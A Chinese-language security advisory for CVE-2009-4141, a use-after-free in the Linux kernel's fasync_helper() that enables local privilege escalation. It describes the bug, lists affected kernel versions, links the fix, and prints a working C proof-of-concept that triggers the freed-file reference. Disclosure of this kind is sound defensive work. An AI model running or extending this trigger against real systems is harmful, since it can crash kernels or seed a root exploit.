Linux Kernel 'fasync_helper()'本地特权提升漏洞

2010-01-1600:00:00

Root

www.seebug.org

0.0004 Low

EPSS

Percentile

0.4%

JSON

Bugraq ID: 37806
CVE ID：CVE-2009-4141

Linux是一款开放源代码的操作系统。
Linux内核处理锁定fasync文件描述符存在安全漏洞，允许攻击者以内核特权执行任意代码或使系统崩溃。
根据Linus分析，“问题是相同文件描述符可在多个fasync列表上，它可以在特定fasync列表上存在一次，但是文件锁定比较特殊，会使用 'fl->fl_fasync’列表无视在什么底层设备驱动或其他的情况下增加任意文件到它所属的fasync列表中。"
这个问题是因为它不正确假定某个文件只能在一个fasync列表中，所以fasync_helper()会清除FASYNC标记。
http://lxr.linux.no/#linux+v2.6.30.4/fs/fcntl.c#L566
当文件描述符最后关闭并且文件释放时，FASYNC标记不再设置，因此它不会在fasync列表中被删除，导致会给释放的结构遗留虚指针(dangling reference)。

Linux kernel 2.6.32
Linux kernel 2.6.31 5

Trustix Secure Enterprise Linux 2.0
Trustix Secure Linux 2.2
Trustix Secure Linux 2.1
Trustix Secure Linux 2.0
Linux kernel 2.6.31 .2
Linux kernel 2.6.31 .11
Linux kernel 2.6.31 -rc7
Trustix Secure Enterprise Linux 2.0
Trustix Secure Linux 2.2
Trustix Secure Linux 2.1
Trustix Secure Linux 2.0
Linux kernel 2.6.31 -rc6
Trustix Secure Enterprise Linux 2.0
Trustix Secure Linux 2.2
Trustix Secure Linux 2.1
Trustix Secure Linux 2.0
Linux kernel 2.6.31 -rc3
Trustix Secure Enterprise Linux 2.0
Trustix Secure Linux 2.2
Trustix Secure Linux 2.1
Trustix Secure Linux 2.0
Linux kernel 2.6.31 -rc1
Trustix Secure Enterprise Linux 2.0
Trustix Secure Linux 2.2
Trustix Secure Linux 2.1
Trustix Secure Linux 2.0
Linux kernel 2.6.31
Linux kernel 2.6.30 rc6
Linux kernel 2.6.30 1
Linux kernel 2.6.30 -rc5
Linux kernel 2.6.30 -rc3
Linux kernel 2.6.30 -rc2
Linux kernel 2.6.30 -rc1
Linux kernel 2.6.30
Linux kernel 2.6.29 4
Linux kernel 2.6.29 1
Linux kernel 2.6.29 -git8
Linux kernel 2.6.29 -git14
Linux kernel 2.6.29 -git1
Linux kernel 2.6.29
Linux kernel 2.6.28 9
Linux kernel 2.6.28 8
Linux kernel 2.6.28 6
Linux kernel 2.6.28 5
Linux kernel 2.6.28 3
Linux kernel 2.6.28 2
Linux kernel 2.6.28 1
Linux kernel 2.6.28 -rc7
Linux kernel 2.6.28 -rc5
Linux kernel 2.6.28 -rc1
Linux kernel 2.6.28 -git7
Linux kernel 2.6.28
Linux kernel 2.6.33-rc4
Trustix Secure Enterprise Linux 2.0
Trustix Secure Linux 2.2
Trustix Secure Linux 2.1
Trustix Secure Linux 2.0
Linux kernel 2.6.32-rc8
Linux kernel 2.6.32-rc7
Linux kernel 2.6.32-rc5
Trustix Secure Enterprise Linux 2.0
Trustix Secure Linux 2.2
Trustix Secure Linux 2.1
Trustix Secure Linux 2.0
Linux kernel 2.6.32-rc4
Linux kernel 2.6.32-rc3
Trustix Secure Enterprise Linux 2.0
Trustix Secure Linux 2.2
Trustix Secure Linux 2.1
Trustix Secure Linux 2.0
Linux kernel 2.6.32-rc2
Linux kernel 2.6.32-rc1
Linux kernel 2.6.31.6
Linux kernel 2.6.31.4
Linux kernel 2.6.31.2
Linux kernel 2.6.31.1
Trustix Secure Linux 2.0
Linux kernel 2.6.31-rc9
Trustix Secure Enterprise Linux 2.0
Trustix Secure Linux 2.2
Trustix Secure Linux 2.1
Trustix Secure Linux 2.0
Linux kernel 2.6.31-rc8
Trustix Secure Enterprise Linux 2.0
Trustix Secure Linux 2.2
Trustix Secure Linux 2.1
Trustix Secure Linux 2.0
Linux kernel 2.6.31-rc7
Trustix Secure Enterprise Linux 2.0
Trustix Secure Linux 2.2
Trustix Secure Linux 2.1
Trustix Secure Linux 2.0
Linux kernel 2.6.31-rc5-git3
Linux kernel 2.6.31-rc4
Linux kernel 2.6.31-rc2
Linux kernel 2.6.31-git11
Trustix Secure Enterprise Linux 2.0
Trustix Secure Linux 2.2
Trustix Secure Linux 2.1
Trustix Secure Linux 2.0
Linux kernel 2.6.30.5
Linux kernel 2.6.30.4
Linux kernel 2.6.30.3
Linux kernel 2.6.29-rc2-git1
Linux kernel 2.6.29-rc2
Linux kernel 2.6.29-rc1
Linux kernel 2.6.28.4
Linux kernel 2.6.28.10
厂商解决方案
用户可参考如下安全公告获得补丁信息：
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=53281b6d34d44308372d16acb7fb5327609f68b6


                                                #ifndef _GNU_SOURCE
# define _GNU_SOURCE
#endif
#include &lt;stdio.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdint.h&gt;
#include &lt;stdbool.h&gt;
#include &lt;fcntl.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;assert.h&gt;
#include &lt;asm/ioctls.h&gt;

// Testcase for locked async fd bug -- taviso 16-Dec-2009
int main(int argc, char **argv)
{
    int fd;
    pid_t child;
    unsigned flag = ~0;

    fd = open(&quot;/dev/urandom&quot;, O_RDONLY);

    // set up exclusive lock, but dont block
    flock(fd, LOCK_EX | LOCK_NB);

    // set ASYNC flag on descriptor
    ioctl(fd, FIOASYNC, &amp;flag);

    // close the file descriptor to trigger the bug
    close(fd);

    // now exec some stuff to populate the AT_RANDOM entries, which will cause
    // the released file to be used.

    // This assumes /bin/true is an elf executable, and that this kernel
    // supports AT_RANDOM.
    do switch (child = fork()) {
            case  0: execl(&quot;/bin/true&quot;, &quot;/bin/true&quot;, NULL);
                     abort();
            case -1: fprintf(stderr, &quot;fork() failed, %m\n&quot;);
                     break;
            default: fprintf(stderr, &quot;.&quot;);
                     break;
    } while (waitpid(child, NULL, 0) != -1);

    fprintf(stderr, &quot;waitpid() failed, %m\n&quot;);
    return 1;
}

0.0004 Low

EPSS

Percentile

0.4%

JSON

Related for SSV:18949